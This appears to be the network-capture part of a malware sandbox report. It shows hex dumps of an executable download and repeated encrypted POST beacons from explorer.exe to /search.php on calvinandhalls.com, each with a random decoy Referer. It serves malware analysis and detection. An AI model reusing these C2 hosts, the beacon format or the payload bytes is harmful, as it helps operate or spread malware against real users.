                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 00 83 c4 44 53 ff 76 04 8d 85 fc fc ff ff 57 50 57 8d 85 fc fe ff ff 50 68 00 02 00 00 ff 76 0c 53 e8 53 3c 00 00 83 c4 24 33 c0 0f b7 8c 45 fc fa ff ff f6 c1 01 74 0e 80 4c 06 1d 10 8a 8c 05 fc fd ff ff eb 11 f6 c1 02 74 15 80 4c 06 1d 20 8a 8c 05 fc fc ff ff 88 8c 06 1d 01 00 00 eb 07 88 9c 06 1d 01 00 00 40 3b c7 72 bf eb 52 8d 86 1d 01 00 00 c7 85 e4 fa ff ff 9f ff ff ff 33 c9 29 85 e4 fa ff ff 8b 95 e4 fa ff ff 8d 84 0e 1d 01 00 00 03 d0 8d 5a 20 83 fb 19 77 0a 80 4c 0e 1d 10 8d 51 20 eb 0d 83 fa 19 77 0c 80 4c 0e 1d 20 8d 51 e0 88 10 eb 03 c6 00 00 41 3b cf 72 c6 8b 4d fc 5f 33 cd 5b e8 34 bd ff ff c9 c3 6a 0c 68 08 fc 43 00 e8 1d c1 ff ff e8 b9 e5 ff ff 8b f8 a1 d0 1a 44 00 85 47 70 74 1d 83 7f 6c 00 74 17 8b 77 68 85 f6 75 08 6a 20 e8 b4 c5 ff ff
                                                                      Data Ascii: DSvWPWPhvSS<$3EtLtL @;rR3)Z wLQ wL QA;rM_3[4jhCDGptltwhuj
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 10 75 13 38 5d f4 74 07 8b 45 f0 83 60 70 fd 33 c0 e9 bf 01 00 00 8b 45 ec 39 58 08 75 26 ff 75 10 ff 75 0c ff 75 08 e8 5b 31 00 00 83 c4 0c 38 5d f4 0f 84 9d 01 00 00 8b 4d f0 83 61 70 fd e9 91 01 00 00 39 5d 08 75 26 e8 12 a2 ff ff c7 00 16 00 00 00 e8 b5 a1 ff ff 38 5d f4 74 07 8b 45 f0 83 60 70 fd b8 ff ff ff 7f e9 66 01 00 00 57 8b 7d 0c 3b fb 75 26 e8 e4 a1 ff ff c7 00 16 00 00 00 e8 87 a1 ff ff 38 5d f4 74 07 8b 45 f0 83 60 70 fd b8 ff ff ff 7f e9 37 01 00 00 56 8b 4d 08 0f b6 09 ff 4d 10 ff 45 08 0f b6 d1 f6 44 02 1d 04 89 4d f8 74 65 39 5d 10 75 19 0f b6 0f f6 44 01 1d 04 89 5d f8 0f 85 f8 00 00 00 66 8b f3 e9 d6 00 00 00 8b 55 08 8a 12 3a d3 75 05 89 5d f8 eb 54 c1 e1 08 0f b6 d2 66 0b ca ff 45 08 0f b7 c9 66 8b f1 89 4d f8 66 3b 70 10 72 0c 66
                                                                      Data Ascii: u8]tE`p3E9Xu&uuu[18]Map9]u&8]tE`pfW};u&8]tE`p7VMMEDMte9]uD]fU:u]TfEfMf;prf
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: ff ff 76 44 e8 51 9c ff ff ff 76 48 e8 49 9c ff ff ff 76 4c e8 41 9c ff ff ff 76 50 e8 39 9c ff ff ff 76 54 e8 31 9c ff ff ff 76 58 e8 29 9c ff ff ff 76 5c e8 21 9c ff ff ff 76 60 e8 19 9c ff ff ff 76 64 e8 11 9c ff ff ff 76 68 e8 09 9c ff ff ff 76 6c e8 01 9c ff ff ff 76 70 e8 f9 9b ff ff ff 76 74 e8 f1 9b ff ff ff 76 78 e8 e9 9b ff ff ff 76 7c e8 e1 9b ff ff 83 c4 40 ff b6 80 00 00 00 e8 d3 9b ff ff ff b6 84 00 00 00 e8 c8 9b ff ff ff b6 88 00 00 00 e8 bd 9b ff ff ff b6 8c 00 00 00 e8 b2 9b ff ff ff b6 90 00 00 00 e8 a7 9b ff ff ff b6 94 00 00 00 e8 9c 9b ff ff ff b6 98 00 00 00 e8 91 9b ff ff ff b6 9c 00 00 00 e8 86 9b ff ff ff b6 a0 00 00 00 e8 7b 9b ff ff ff b6 a4 00 00 00 e8 70 9b ff ff ff b6 a8 00 00 00 e8 65 9b ff ff ff b6 bc 00 00 00 e8 5a 9b ff
                                                                      Data Ascii: vDQvHIvLAvP9vT1vX)v\!v`vdvhvlvpvtvxv|@{peZ
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 49 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 24 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 83 e1 03 74 09 8a 06 88 07 46 47 49 75 f7 58 5e 5f 5d c3 ba 10 00 00 00 2b d0 2b ca 51 8b c2 8b c8 83 e1 03 74 09 8a 16 88 17 46 47 49 75 f7 c1 e8 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 48 75 f3 59 e9 0b ff ff ff 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 58 47 41 00 ff 15 14 11 41 00 a3 20 20 44 00 c3 a1 20 20 44 00 83 f8 ff 74 0c 83 f8 fe 74 07 50 ff 15 f4 11 41 00 c3 cc cc cc cc cc cc cc cc cc 51 8d 4c 24 08 2b c8 83 e1 0f 03 c1 1b c9 0b c1 59 e9 8a db ff ff 51 8d
                                                                      Data Ascii: g@foPfw`fpJutItfofvJut$tvIutFGIuX^_]++QtFGIutvHuY3PPjPjh@hXGAA D DttPAQL$+YQ
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 00 01 00 eb 06 81 ca 00 00 02 00 f7 c3 00 10 00 00 74 06 81 ca 00 00 04 00 89 55 0c 8b c2 33 f6 39 35 ac b0 45 02 0f 84 8d 01 00 00 81 e7 1f 03 08 03 89 7d ec 0f ae 5d f0 8b 45 f0 84 c0 79 03 6a 10 5e a9 00 02 00 00 74 03 83 ce 08 a9 00 04 00 00 74 03 83 ce 04 a9 00 08 00 00 74 03 83 ce 02 a9 00 10 00 00 74 03 83 ce 01 a9 00 01 00 00 74 06 81 ce 00 00 08 00 8b c8 bb 00 60 00 00 23 cb 74 2a 81 f9 00 20 00 00 74 1c 81 f9 00 40 00 00 74 0c 3b cb 75 16 81 ce 00 03 00 00 eb 0e 81 ce 00 02 00 00 eb 06 81 ce 00 01 00 00 bf 40 80 00 00 23 c7 83 e8 40 74 1c 2d c0 7f 00 00 74 0d 83 e8 40 75 16 81 ce 00 00 00 01 eb 0e 81 ce 00 00 00 03 eb 06 81 ce 00 00 00 02 8b 45 ec 8b d0 23 45 08 f7 d2 23 d6 0b d0 3b d6 75 07 8b c6 e9 b0 00 00 00 e8 13 fd ff ff 50 89 45 f4 e8 58
                                                                      Data Ascii: tU395E}]Eyj^ttttt`#t* t@t;u@#@t-t@uE#E#;uPEX
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 00 00 00 00 00 f3 3f 00 00 00 bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac ec 3f 27 5c 1b f2 7c 23 3c 3e 00 00 00 00 00 00 f4 3f 00 00 00 24 e2 0e ed 3f ce 7d b2 64 6a 88 23 3e 00 00 00 00 00 80 f4 3f 00 00 00 cc 57 6e ed 3f d7 88 13 4d 56 78 3a 3e 00 00 00 00 00 00 f5 3f 00 00 00 2c f8 ca ed 3f 31 8d 19 38 6f 1a 2c 3e 00 00 00 00 00 80 f5 3f 00 00 00 44 dd 24 ee 3f 09 63 bd 2f ba 0a 19 3e 00 00 00 00 00 00 f6 3f 00 00 00 40 20 7c ee 3f 94 f5 78 37 7c a8 31 3e 00 00 00 00 00 80 f6 3f 00 00 00 7c d9 d0 ee 3f 1c d6 d9 1e 39 08 12 3e 00 00 00 00 00 00 f7 3f 00 00 00 70 20 23 ef 3f 8c 49 41 8d 8b 75 3d 3e 00 00 00 00 00 80 f7 3f 00 00 00 d0 0b 73 ef 3f 88 78 00 d9 b4 0f 34 3e 00 00 00 00 00 00 f8 3f 00 00 00 70 b1 c0 ef 3f
                                                                      Data Ascii: ?G?aji9>?T|?'\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ |?x7|1>?|?9>?p #?IAu=>?s?x4>?p?


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.54974123.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:20 UTC287OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://nmesrodehsvre.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 181
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:20 UTC181OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 42 da 77 bc 84 a3 5b 11 b7 1e 34 9d 5f 92 f7 0a 30 a9 01 38 6d b0 b1 e2 74 f8 a5 45 6f d4 bc 3c 98 5e 49 95 ce 1c 3c 3e 6b 2b 26 dc 63 d2 95 90 4f f3 bd 4d 0f 35 e1 6b 57 da 49 77 f9 fb 99 ab 0e 25 c2 5d e5 4d 99 0e 37 81 39 dc 40 5a 56 7a 49 fc d0 4b e7 87 3d ca 4b 3a e2 c0 9d 21 c1 97 56 8e 8c 8d b6 31 03
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[CLj4%<Bw[4_08mtEo<^I<>k+&cOM5kWIw%]M79@ZVzIK=K:!V1
                                                                      2024-09-25 14:02:20 UTC294INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:20 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      2024-09-25 14:02:20 UTC7898INData Raw: 31 65 65 36 0d 0a 18 00 00 00 1e 0d a7 11 ce 1d a7 8b 38 1f d3 67 1f 57 07 21 4f 59 7d 35 c1 9e 69 4b 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa dc
                                                                      Data Ascii: 1ee68gW!OY}5iKn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                      2024-09-25 14:02:20 UTC18INData Raw: ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c c7
                                                                      Data Ascii: MQF 82
                                                                      2024-09-25 14:02:20 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-09-25 14:02:20 UTC8192INData Raw: 32 30 30 30 0d 0a 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f 19
                                                                      Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                      2024-09-25 14:02:20 UTC6INData Raw: 20 09 6c 1a f8 c5
                                                                      Data Ascii: l
                                                                      2024-09-25 14:02:20 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-09-25 14:02:20 UTC8192INData Raw: 32 30 30 30 0d 0a 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 ab
                                                                      Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                      2024-09-25 14:02:20 UTC6INData Raw: 4f 16 27 c7 be ec
                                                                      Data Ascii: O'
                                                                      2024-09-25 14:02:20 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.54974223.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:21 UTC286OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://ircvpemvdgiy.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 311
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:21 UTC311OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 66 a4 21 a2 b9 a7 16 3b f3 11 0a 96 2e e4 d2 14 60 ff 1d 3c 26 83 fb 8c 36 c8 c1 19 72 ef ad 69 ef 42 52 e6 c1 66 15 20 7e 2e 48 dd 0a 99 90 a0 23 f4 86 65 62 1d 8a 1d 53 c2 5a 15 c6 e9 bc 81 1e 30 cf 0f d4 4f bf 70 3d bb 08 9a 61 7b 35 00 7b c1 d8 10 9b 92 0f 81 52 2c fa b5 bb 03 f3 bd 7c 9b 99 87 8f 2e 4d a9 83 bd 01 3e 9e 54 4c f2 7b 72 4c a5 5e 20 2e b6 34 19 2b 8f c4 fa 27 78 a8 db 07 eb 36 f1 b4 da 29 24 6f 55 c1 43 68 17 12 0a f5 2a ee bb 21 2e 0b 29 16 c7 bb 73 2d 41 4a a7 90 e5 3a fa b1 36 d5 67 d2 ab d8 d5 01 96 71
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lj4%<f!;.`<&6riBRf ~.H#ebSZ0Op=a{5{R,|.M>TL{rL^ .4+'x6)$oUCh*!.)s-AJ:6gq
                                                                      2024-09-25 14:02:22 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:22 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.54974323.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:22 UTC290OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://yqvikokvyrwyspvc.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 171
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:22 UTC171OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 5c ab 75 a7 89 a7 0f 09 f6 7a 62 85 51 88 96 35 72 d6 16 0f 28 b5 db e7 5a e1 c8 73 60 90 ee 33 e8 54 21 88 e6 75 7b 77 71 55 30 f8 6d 94 da 8c 39 ef ed 60 0a 10 90 78 28 e3 35 1b 83 98 e9 92 04 1e d2 0a f7 3a 83 33 20 b4 54 8f 56 67 25 36 00 f4 b7 74 fb 86 37 9c 2c 6e fc dd e4
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lk4%<\uzbQ5r(Zs`3T!u{wqU0m9`x(5:3 TVg%6t7,n
                                                                      2024-09-25 14:02:23 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:22 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.54974423.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:23 UTC286OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://kersnljeyirt.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 350
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:23 UTC350OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 61 e8 34 9f ab da 5b 47 ce 25 78 f1 78 f5 8b 10 03 e5 05 52 2c 90 ce 9f 2a a7 f5 14 43 ed bf 32 82 28 47 bd d4 78 3c 4d 1a 49 4c 8f 15 de cb 94 13 c8 e8 44 2b 0d 9e 13 29 b7 58 5e 8c e8 a8 97 51 70 b2 77 a3 55 a8 12 3b c6 1d d0 77 50 30 66 43 ca d5 1b 8f 94 04 c1 4c 62 e2 fe 89 03 d6 85 59 86 b2 8b 96 5d 64 9d b6 da 1b 16 cc 00 33 f0 64 64 4b 89 4e 3c 46 a5 44 2b 00 8e 90 dc 7b 37 c3 ab 06 a7 55 82 c0 b3 6e 77 1f 36 a7 02 37 01 0c 1d f0 00 a4 91 65 2b 00 32 3e fe 81 31 5a 08 23 c2 e9 9f 58 8b a1 66 df 30 96 be c2 d3 05 8d 5d
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lh4%<a4[G%xxR,*C2(Gx<MILD+)X^QpwU;wP0fCLbY]d3ddKN<FD+{7Unw67e+2>1Z#Xf0]
                                                                      2024-09-25 14:02:23 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:23 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.54974523.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:24 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://udbfyhiovnpjdsu.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 223
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:24 UTC223OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 2e a4 03 fb c4 c9 1e 0a b3 6b 22 b4 5f 85 90 2f 32 f7 19 2a 28 94 aa 9a 39 eb b6 5c 57 d6 94 7f 8a 47 27 8a 9b 0d 14 77 44 39 29 83 2a ca f3 80 5d e4 fa 59 1d 1d e0 09 4e cc 65 1d c2 ca f7 85 23 6c a2 14 eb 36 e1 1b 78 d8 0e d3 35 3a 6d 76 16 ef c5 15 a7 87 0e ca 02 25 8f f9 8a 32 c5 b8 43 f0 a6 95 b5 0c 66 c1 db 9c 7f 0d a2 41 49 9c 1a 4d 5b e6 3b 14 52 e7 12 1c 21 85 8c d4 05 40 bb c8 74 e3 40 99 cc ed 6a 3d 32 66 ce 6e 7d 6d 7c
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Li4%<.k"_/2*(9\WG'wD9)*]YNe#l6x5:mv%2CfAIM[;R!@t@j=2fn}m|
                                                                      2024-09-25 14:02:24 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:24 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.54974623.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:25 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://gmhyvptkkbkcth.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 288
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:25 UTC288OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 61 ea 12 e1 d4 b1 4d 4d d2 2b 13 98 5f c9 c7 37 1e b4 2e 01 7f 83 ae ff 20 bf ba 63 67 e4 b2 49 f8 57 4d bb 93 68 1e 69 48 07 3f 8f 33 c3 eb 8b 51 db fd 36 19 5a 99 1e 52 a2 6f 40 e9 e0 a6 ab 07 02 91 0a b0 7d fd 61 7c bc 2c dd 6c 41 32 1b 05 fd dc 6b bc c9 05 89 0d 2b d5 bb b2 3d e1 ef 4e b5 ac e6 bc 53 31 88 cf c2 68 16 c5 7d 13 96 18 70 13 f5 27 02 22 a4 10 1b 4c fb ba 89 35 6a d3 cf 7d af 2a f8 da fb 6b 3d 1d 42 ee 64 35 68 5f 0c ec 25 bc af 11 0f 28 74 34 95 f0 74 44 4f 01 ad 98 db 44 e8 a1 0f 90 66 a4 fd b6 b6 5e 9d 5c
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Ln4%<aMM+_7. cgIWMhiH?3Q6ZRo@}a|,lA2k+=NS1h}p'"L5j}*k=Bd5h_%(t4tDODf^\
                                                                      2024-09-25 14:02:25 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:25 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.54974723.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:26 UTC286OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://kgiatertamgp.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 321
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:26 UTC321OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3c a9 38 b3 98 ac 4f 28 b1 37 03 ff 3a 85 f0 1c 2b ee 30 27 6c ce fa 8d 7c ee a0 5c 7c f3 a2 42 ee 45 44 f7 c6 5b 21 72 49 5f 55 f1 3f b9 d0 ce 53 e8 e6 30 79 41 8d 04 4a ba 6b 5a c8 8d e0 a7 39 79 cc 6f fb 7f b5 72 5b 9e 3e 80 6a 7b 76 7b 1b f3 bc 0d 9f a3 7c c3 50 65 9a b3 c1 35 aa 88 47 af 8d 84 98 09 2b a7 b2 d0 7e 49 91 16 0b eb 60 49 19 ae 3e 26 7b fa 28 79 1e 8c 87 83 33 35 d9 d5 35 9c 4e ca ae e6 2a 00 1a 66 bb 1b 2c 57 32 2d a6 0d 98 a4 60 5b 28 2f 0f ca fc 26 58 44 5f dc ee c3 0e c9 ff 21 ee 3b be 94 f2 9d 6a b6 7b
